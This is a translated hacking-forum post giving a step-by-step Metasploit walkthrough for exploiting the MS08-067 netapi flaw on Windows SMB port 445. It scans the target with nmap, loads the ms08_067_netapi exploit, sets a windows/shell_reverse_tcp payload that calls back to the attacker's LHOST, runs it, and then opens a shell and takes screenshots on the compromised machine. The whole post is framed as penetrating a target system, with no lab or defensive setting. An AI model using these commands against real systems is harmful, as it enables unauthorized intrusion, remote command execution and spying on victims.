Netapi Vulnerable and Exploiting It

M3m0ry

Kıdemli Üye
3 Haz 2017
4,410
125
3
xD
Hi TurkHackTeam members.

In this article, i will speak about Netapi (MS08-067) vulnerable and about exploiting it. I start with definitions.


What is NETAPI (MS08-067) Vulnerable ?

This vulnerable is result of a decomposition error in SMB module which is in netapi.dll. If attacker can exploit that vulnerable, he/she can run a code in target system as an full authorized. You need to still open your firewall for protect yourself from that attackers.

NETAPI (MS08-067) Vulnerable and Exploiting It

Now we'll try to get running code authority in target system with exploiting to that Netapi vulnerable.

First, we'll write this command. And we'll scan ports which have vulnerable in target system.

Kod:
nmap -sT -A ip_address

dNQQNB.png


As you can see there is an vulnerable in 445 port. We'll try to penetrate to target system with using that netapi vulnerable. Now, we are opening métasploit with this code;

Kod:
msfconsole

RfPAa4.png


We are searching our exploit with typing this code;

Kod:
search ms08-067

Qde0Jz.png


We are selecting that exploit with this command;

Kod:
use exploit/windows/smb/ms08_067_netapi

O04zx4.png


We are typing this code for looking exploit's necessitys.

Kod:
options

US8d86.png


As you can see that wants to some various informations. We need to type RHOST information out of default informations. So, we'll indicate target system's IP address with this code;

Kod:
set RHOSTS ip_address

L7a3zS.png


We'll indicate our payload. We'll use shell_reverse_tcp payload. So, we'll indicate our payload like this;

Kod:
set PAYLOAD windows/shell_reverse_tcp

zSeHGx.png


We'll look wanted informations with typing this code;

Kod:
options

S633LC.png


As you can see there is an undefined LHOST information. We'll type our machine's IP address in here. Enter this code;

Kod:
set LHOST out_ip_address

L0BzS8.png


We are running our payload now;

Kod:
exploit

6WBU1S.png


As you can see, we penetrated to target system. We can run commands over system now. We can run commands which we want to run now. For this, type this command;

Kod:
shell

fGNTSU.png


You can use this command for take screenshot;

Kod:
screenshot

4zeVTS.png




Source: https://www.turkhackteam.org/siber-guvenlik/1922792-netapi-zafiyeti-ve-zafiyetin-somurulmesi.html
Translator: M3m0ry
 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.